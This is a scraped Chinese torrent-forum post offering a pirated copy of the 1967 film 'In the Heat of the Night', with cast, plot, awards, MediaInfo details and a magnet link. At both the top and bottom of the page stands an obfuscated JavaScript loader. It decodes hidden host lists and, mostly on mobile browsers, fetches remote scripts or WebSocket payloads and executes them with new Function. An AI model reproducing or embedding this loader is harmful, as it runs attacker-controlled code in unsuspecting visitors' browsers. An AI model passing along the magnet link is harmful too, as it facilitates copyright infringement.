炎热的夜晚[中文字幕].In.the.Heat.of.the.Night.1967.1080p.FriDay.WEB-DL.H264.AAC 3.01GB

版主小s 1月前 280

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

 

◎译 名 炎热的夜晚 / 恶夜追缉令 / 月黑风急杀人夜

◎片 名 In the Heat of the Night

◎年 代 1967

◎产 地 美国

◎类 别 剧情 / 悬疑 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1967-08-02

◎IMDb链接 https://www.imdb.com/title/tt0061811/

◎豆瓣评分 7.7/10 (3355人评价)

◎豆瓣链接 https://movie.douban.com/subject/1295480/

◎片 长 109 分钟

◎导 演 诺曼·杰威森 Norman Jewison (id:1010709)

◎编 剧 斯特林·西利芬特 Stirling Silliphant (id:1016812)

◎演 员 西德尼·波蒂埃 Sidney Poitier (id:1031937)

罗德·斯泰格尔 Rod Steiger (id:1002747)

沃伦·奥茨 Warren Oates (id:1010664)

李·格兰特 Lee Grant (id:1041192)

拉里·盖茨 Larry Gates (id:1097614)

Kermit Murdock Kermit Murdock (id:1133953)

Larry D. Mann Larry D. Mann (id:1117513)

阿瑟·马利特 Arthur Malet (id:1122773)

安东尼·詹姆斯 Anthony James (id:1012544)

彼得·惠特尼 Peter Whitney (id:1167073)

比·理查兹 Beah Richards (id:1140179)

詹姆斯·帕特森 James Patterson (id:1134908)

斯科特·威尔森 Scott Wilson (id:1002813)

昆汀迪恩 Quentin Dean (id:1282108)

哈尔·阿什贝 Hal Ashby (id:1049927)

林恩·斯塔马斯特 Lynn Stalmaster (id:1276256)

罗伯特·普里斯特利 Robert Priestley (id:1294912)

Del Armstrong Del Armstrong (id:1277407)

哈尔·阿什贝 Hal Ashby (id:1049927)

◎标 签 美国 / 悬疑 / 犯罪 / 种族 / 1967 / 美国电影 / 奥斯卡最佳影片 / 奥斯卡

◎简 介

一个从芝加哥来到斯巴达准备建工厂的商人Mr. Colbert被发现死于街头。一个正在火车站等车的黑人Virgil Tibbs(西德尼·波蒂埃 Sidney Poitier 饰)被警察当作嫌疑犯抓到警察局。一番盘查之下,Tibbs告诉当地警方,他也是一名警察,而且擅长处理凶杀案件。他遭到调查的原因只是因为他是黑人,他迫切想离开当地,然而Tibbs的上司让他留在当地,和当地警长Bill Gillespie(罗德·斯泰格尔 Rod Steiger 饰)一起查案。在这个种族歧视极为严重的地方,Tibbs的调查遭遇了重重阻拦,Bill也劝他早日离开,不要再插手。然而Tibbs却始终不肯放弃,坚持要查出真相......

本片获1968年奥斯卡7项提名,最后赢得包括最佳影片和最佳男主角等5项大奖。

◎获奖情况 (共7项)

第40届奥斯卡金像奖 (1968)

最佳影片

└──沃尔特·米里施 (id:1042038)

最佳导演(提名)

└──诺曼·杰威森 (id:1010709)

最佳男主角

└──罗德·斯泰格尔 (id:1002747)

最佳改编剧本

└──斯特林·西利芬特 (id:1016812)

最佳剪辑

└──哈尔·阿什贝 (id:1049927)

最佳音响

最佳音效(提名)

└──詹姆斯·理查德 (id:1295582)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 102629160335992171939374766181562211951 (0x4D35A8453210E575A9A552DB6E845E6F)

  4. Complete name : I[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.01 GiB

  8. Duration : 1 h 49 min

  9. Overall bit rate : 3 935 kb/s

  10. Encoded date : UTC 2021-10-23 14:08:53

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 1 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 1 frame

  21. Format settings, GOP : M=1, N=60

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 49 min

  24. Bit rate mode : Constant

  25. Bit rate : 3 807 kb/s

  26. Nominal bit rate : 4 000 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 29.970 (30000/1001/53354) FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.061

  37. Stream size : 2.91 GiB (97%)

  38. Language : English

  39. Default : Yes

  40. Forced : No


  41. Audio

  42. ID : 2

  43. Format : AAC LC

  44. Format/Info : Advanced Audio Codec Low Complexity

  45. Codec ID : A_AAC-2

  46. Duration : 1 h 49 min

  47. Bit rate : 125 kb/s

  48. Channel(s) : 2 channels

  49. Channel layout : L R

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 46.875 FPS (1024 SPF)

  52. Compression mode : Lossy

  53. Stream size : 98.3 MiB (3%)

  54. Title : English

  55. Language : English

  56. Default : Yes

  57. Forced : No


  58. Text #1

  59. ID : 3

  60. Format : UTF-8

  61. Codec ID : S_TEXT/UTF8

  62. Codec ID/Info : UTF-8 Plain Text

  63. Duration : 1 h 48 min

  64. Bit rate : 35 b/s

  65. Count of elements : 1043

  66. Stream size : 28.3 KiB (0%)

  67. Title : Chinese Simplified

  68. Language : Chinese

  69. Default : Yes

  70. Forced : No


  71. Text #2

  72. ID : 4

  73. Format : UTF-8

  74. Codec ID : S_TEXT/UTF8

  75. Codec ID/Info : UTF-8 Plain Text

  76. Duration : 1 h 48 min

  77. Bit rate : 35 b/s

  78. Count of elements : 1043

  79. Stream size : 28.3 KiB (0%)

  80. Title : Chinese Traditional

  81. Language : Chinese

  82. Default : No

  83. Forced : No




复制代码


TAGS 剧情 惊悚 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:D93D807560C3CE365FA87459E8CB8B408374B26A

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};